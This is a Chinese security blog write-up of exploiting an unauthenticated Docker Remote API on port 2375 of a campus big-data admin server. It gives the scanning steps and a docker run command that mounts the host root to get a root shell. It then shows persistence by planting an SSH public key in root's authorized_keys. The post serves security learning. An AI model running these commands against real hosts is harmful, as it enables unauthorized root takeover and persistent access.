某校大数据管理后台Docker API未授权漏洞

某校大数据管理后台Docker API未授权漏洞

原创 大荒Sec 太乙Sec实验室 2025-06-01 05:58

免责声明
本公众号 太乙Sec实验室
所提供的实验环境均是本地搭建,仅限于网络安全研究与学习
。旨在为安全爱好者提供技术交流。任何个人或组织因传播、利用本公众号所提供的信息而进行的操作,所导致的直接或间接后果及损失,均由使用者本人负责。太乙Sec实验室
及作者对此不承担任何责任

实验背景

翻了一下大一的笔记,记一次在校园的漏扫,某大数据管理后台Docker API未授权漏洞(
内网映射对外开放)


docker
上配置了远程访问
docker

节点上会开放一个
TCP
端口
2375
,绑定在
0.0.0.0
上,如果没有做限制的话,攻击者就可以通过
Docker
未授权来控制服务器

(注:本实验应在获得明确授权的教学网络环境中开展,严禁在生产环境进行类似操作)

信息收集

fscan一把梭,发现172.16.55.3 code=200,怀疑目标存在漏洞,so更一步进行资产收集,发现漏洞

某校大数据管理后台Docker API未授权漏洞 -1

GOBY一把梭

某校大数据管理后台Docker API未授权漏洞 -2

漏洞验证

http://172.16.55.3:2375/info

![图形用户界面, 文本, 电子邮件

描述已自动生成](https://mmbiz.qpic.cn/sz_mmbiz_jpg/tHlQeib8sz1JrrIOaELWYObYOlnJ3WLTydUx4fcGVZfAB95RhfNc4kSzVhVRNwTqCC3kbDbJETia2JqnjIlwvdPg/640?wx_fmt=jpeg&from=appmsg “”)

在这里拉取一个镜像文件
busybox

id

![图形用户界面, 文本

描述已自动生成](https://mmbiz.qpic.cn/sz_mmbiz_jpg/tHlQeib8sz1JrrIOaELWYObYOlnJ3WLTyd2IZG13kDKtYniawqbvmtVBycoqojrJLibic5LIk8vHEamiawa2ohDyOtw/640?wx_fmt=jpeg&from=appmsg “”)

docker  -H tcp://172.16.55.3:2375 run -it -v /:/mnt  19485c79a9bb   /bin/bash 

这条命令的意思是启动一个
image ID


19485c79a9bb
的容器,并且将该宿主机的根目录挂在到容器的
/mnt
目录下
,
最后启动之后就会获得该容器宿主机的
shell 

Whoami发现是root 
直接cd mnt/root/

![图形用户界面, 文本

描述已自动生成](https://mmbiz.qpic.cn/sz_mmbiz_jpg/tHlQeib8sz1JrrIOaELWYObYOlnJ3WLTyGHxFuCGAI77kAfejuYcV3zYV3f9TRb1aFJXPDa4uLD0Picib8gwybr1w/640?wx_fmt=jpeg&from=appmsg “”)

看到到服务器上的
root
下的文件。在
kali
生成:
ssh-keygen -t rsa 看下生成的文件

![图形用户界面

中度可信度描述已自动生成](https://mmbiz.qpic.cn/sz_mmbiz_jpg/tHlQeib8sz1JrrIOaELWYObYOlnJ3WLTyiaCJX9TxLibGTKIZsnDpkJzKWDmHicrNopdLIP6dpS0xJWfnRlN0d3DiaA/640?wx_fmt=jpeg&from=appmsg “”)

id_rsa
id_rsa.pub再回到远程主机上来使用
echo
指令将公钥写进去
,
达到远程免密
ssh
连接。

ssh -i id_rsa root@ip

总结

本次攻击围绕校园大数据管理后台 Docker API 未授权漏洞展开,我将按照操作步骤梳理出完整的攻击链路:
1. 信息收集
:使用 fscan 工具扫描发现目标 IP 172.16.55.3 响应 code=200,存在漏洞可疑性,后借助 GOBY 工具进一步确认资产信息,锁定漏洞。

  1. 漏洞验证
    :访问http://172.16.55.3:2375/info,验证 Docker API 未授权访问漏洞存在。

  2. 权限获取
    :拉取 busybox 镜像,执行docker -H tcp://172.16.55.3:2375 run -it -v /:/mnt 19485c79a9bb /bin/bash
    命令,将宿主机根目录挂载到容器 /mnt 目录,获取容器宿主机的 root 权限 Shell。

  3. 持久化控制
    :在 Kali 系统中通过ssh-keygen -t rsa
    生成 SSH 密钥对,将公钥写入目标主机~/.ssh/authorized_keys
    文件,实现使用私钥ssh -i id_rsa root@ip
    远程免密登录控制 。

往期精彩回顾

记一次某校情平台水平越权,导致全校学生信息泄露

深度修复 DeepSeek 云端部署潜在威胁漏洞

关注我,了解更多知识,别忘了关注+点赞哦!****